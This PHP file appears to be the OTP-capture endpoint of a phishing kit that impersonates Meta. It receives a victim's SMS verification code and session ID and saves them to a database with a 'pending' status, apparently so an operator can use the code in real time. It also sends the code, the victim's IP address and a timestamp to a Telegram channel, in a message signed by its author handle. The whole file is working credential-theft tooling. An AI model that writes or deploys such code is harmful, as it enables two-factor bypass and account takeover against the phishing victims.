<?php
session_start();
require_once '../main/config.php';
require_once '../main/settings.php';

header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: POST, OPTIONS");
header("Access-Control-Allow-Headers: Content-Type, Authorization");
header("Access-Control-Allow-Credentials: true");
header("Access-Control-Max-Age: 3600");


if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    http_response_code(200);  // Return 200 OK for preflight
    exit;
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    echo "Method not allowed";
    exit;
}


try {
    $otp = isset($_POST['otp']) ? trim($_POST['otp']) : '';
    $session_id  = isset($_POST['session_id']) ? $_POST['session_id'] : '';
    if (empty($otp) || empty($session_id)) {
        throw new Exception('Invalid credentials');
    }
    $ip = getIPAddress();
    $date = now();
    $message = "=== 🔐 Meta - SMS 🔐 ===\n";
    $message .= "👤 OTP:          <code>$otp</code>\n";
    $message .= "🌐 IP Address:        <code>$ip</code>\n";
    $message .= "📅 Date:             <code>$date</code>\n";
    $message .= "🆔 Session ID:        <code>$session_id</code>\n\n";
    $message .= "=== by @nayfercraxx ===";
    $conn = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
    if ($conn->connect_error) {
        throw new Exception('Database connection failed');
    }
    $conn->begin_transaction();
    try {
        $check_stmt = $conn->prepare("SELECT id FROM users WHERE session_id = ?");
        if (!$check_stmt) {
            throw new Exception('Failed to prepare check statement: ' . $conn->error);
        }

        $check_stmt->bind_param("s", $session_id);
        $check_stmt->execute();
        $result = $check_stmt->get_result();
        $exists = $result->num_rows > 0;
        $check_stmt->close();

        if ($exists) {
            $stmt = $conn->prepare("UPDATE users SET
                status = 'pending',
                smsCode = ?,
                updated_at = CURRENT_TIMESTAMP
                WHERE session_id = ?");

            if (!$stmt) {
                throw new Exception('Failed to prepare update statement: ' . $conn->error);
            }

            $stmt->bind_param("ss", $otp, $session_id);
        }

        if (!$stmt->execute()) {
            throw new Exception('Failed to ' . ($exists ? 'update' : 'insert') . ' user data: ' . $stmt->error);
        }
        if (SEND_OTP) {
            telegram_message($message);
        }
        $conn->commit();
        header('Content-Type: application/json');
        echo json_encode(["status" => "success"]);

    } catch (Exception $e) {
        $conn->rollback();
        throw $e;
    } finally {
        if (isset($stmt)) $stmt->close();
        $conn->close();
    }

} catch (Exception $e) {
    http_response_code(400);
    header('Content-Type: application/json');
    echo json_encode(["error" => $e->getMessage()]);
}
?>
